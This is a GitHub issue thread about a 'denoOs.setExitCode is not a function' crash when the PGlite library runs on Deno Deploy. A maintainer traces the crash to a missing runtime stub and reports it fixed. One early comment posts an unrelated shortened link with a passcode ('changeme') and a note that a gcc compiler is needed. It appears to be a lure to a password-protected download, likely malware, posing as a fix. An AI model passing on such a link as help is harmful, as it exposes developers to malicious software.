### ISSUE TITLE
`denoOs.setExitCode` is not a function at Process.set (node:process) in Deno Deploy

### ISSUE THREAD

**Issue by nestarz** [denoland/deno#25466] opened 2024-09-05 13:03 UTC
I'm encountering a `TypeError: denoOs.setExitCode is not a function` when trying to run a basic query using `PGlite` in Deno Deploy. The issue occurs when attempting to query the database, which leads to a crash.

**Steps to reproduce**:
1. Use Deno Deploy playground.
3. Execute the following code:

    ```ts
    import { PGlite } from "npm:@electric-sql/pglite";

    const db = new PGlite();
    await db.query("select 'Hello world' as message;");
    ```

4. This results in the following error:

```bash
TypeError: denoOs.setExitCode is not a function
    at Process.set (node:process:329:12)
    at quit_ (file:///node_modules/.deno/@electric-sql+pglite@0.2.5/node_modules/@electric-sql/pglite/dist/postgres.js:349:22)
    at handleException (file:///node_modules/.deno/@electric-sql+pglite@0.2.5/node_modules/@electric-sql/pglite/dist/postgres.js:7501:7)
```

**Environment**:
- Deno Version: Deploy
- `@electric-sql/pglite` Version: 0.2.5

**Expected behavior**:  
I expected the query to return a result without causing a crash or throwing an error.

**Actual behavior**:  
The application crashes with a `TypeError: denoOs.setExitCode is not a function` message.

**Additional context**:  
It seems that the `denoOs.setExitCode` function is being called, but it is undefined or not supported in the latest Deno release. This issue may be related to differences in how Deno handles process exit behavior compared to Node.js.

**Comment by NavSethi2006** [comment] 2024-09-05 13:03
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by bartlomieju** [comment] 2024-09-05 13:13
I can't reproduce the problem on either Deno 2.0.0-rc.0 or latest canary. The process exits cleanly for me with provided reproduction.

**Comment by nestarz** [comment] 2024-09-05 13:27
@bartlomieju here a Deno Deploy reproduction https://dash.deno.com/playground/denoos-setexitcode-repro
Maybe Deploy is not up to date ?

**Comment by bartlomieju** [comment] 2024-09-05 13:28
@magurotuna can you please take a look?

**Comment by magurotuna** [comment] 2024-09-06 03:46
Sure, I'll do

**Comment by nestarz** [comment] 2024-09-13 12:47
@magurotuna  Is it related to https://github.com/denoland/deno/issues/25028 ?

**Comment by magurotuna** [comment] 2024-09-16 07:48
No, it is simply because `setExitCode` is not implemented in the runtime of Deno Deploy. We need to have a stub implementation for this in Deploy as well.

**Comment by magurotuna** [comment] 2024-10-18 12:20
It's now fixed on prod

**Closed by magurotuna** 2024-10-18 12:20 UTC
Labels: needs info, node compat
